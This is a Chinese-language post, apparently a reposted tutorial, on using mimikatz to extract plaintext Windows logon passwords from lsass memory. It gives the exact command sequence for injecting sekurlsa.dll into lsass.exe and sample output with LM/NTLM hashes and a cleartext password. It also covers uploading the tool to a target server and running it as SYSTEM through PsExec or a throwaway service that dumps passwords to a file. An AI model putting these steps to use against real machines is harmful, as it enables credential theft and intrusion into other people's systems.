今日在群看到某牛發一連結,老外所書某文,介紹使用此器擷取系統純文字密碼的一些方法,具體如下:
注:使用前需確定自身系統是x86還是x64
本人測試環境:windows 2003
密碼長度:8位
進入檔案所在目錄,雙擊開啟mimikatz.exe,按照以下步驟進行,
1、mimikatz # privilege::debug
2、mimikatz # inject::process lsass.exe sekurlsa.dll
3、mimikatz # @getLogonPasswords
Authentification Id : 0;434898
Package d’authentification : NTLM
Utilisateur principal : User
Domaine d’authentification : vm-w7-ult
msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
wdigest : fuck1234
tspkg : fuck1234 這裡就是密碼
我測試的時候還能看到曆史密碼。比較牛x的神器!
經網路眾人分析,支援系統如下:
Windows XP (部分可以)
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1
XP有些系統版本會出現拒絕訪問。
在遠程終端中運行該程式部分會提示:”儲存空間不足,無法處理此命令”。
這是因為在終端模式下,不能插入遠線程,跨會話不能注入,你需要使用如下方法執行該程式:
首先提取幾個檔案:
mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll
打包後上傳至目標伺服器,然後解壓釋放,注意路徑中絕對不能有中文(可以有空格)!否則載入DLL的時候會報錯:找不到檔案。
//最簡單實用的方法,使用 PsExec.exe 啟動。//在本機啟動互動式命令提示視窗psexec
psexec -s c:\mimikatz\mimikatz.exe
//啟動 mimikatz.exeC:\mimikatz_trunk\Win32\mimikatz.exe//提升許可權privilege::debug//注入dll,要用絕對路徑!並且路徑中絕對不能有中文(可以有空格)!inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"//抓取密碼@getLogonPasswords//退出,不要用 ctrl + c,會導致 mimikatz.exe CPU 佔用達到 100%,死迴圈。exit
//建立服務方法sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"sc start getpasswordsc delete getpassword
原:http://blog.gentilkiwi.com/mimikatz
原文地址:http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass
參考地址:http://lcx.cc/?FoxNews=2265.html
本地:http://jafee.net/Soft/Hack/mimikatz.rar